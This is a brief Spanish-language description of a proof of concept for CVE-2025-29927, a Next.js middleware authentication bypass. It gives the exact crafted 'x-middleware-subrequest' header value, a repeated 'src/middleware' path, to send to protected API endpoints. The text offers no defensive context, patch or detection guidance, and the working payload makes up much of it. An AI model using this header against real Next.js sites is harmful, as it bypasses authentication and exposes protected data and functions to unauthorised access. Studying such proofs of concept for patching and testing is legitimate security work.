
Prueba de concepto para CVE-2025-29927 que evita la autenticación de middleware de Next.js enviando un encabezado x-middleware-subrequest manipulado a endpoints de API protegidos.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware como encabezado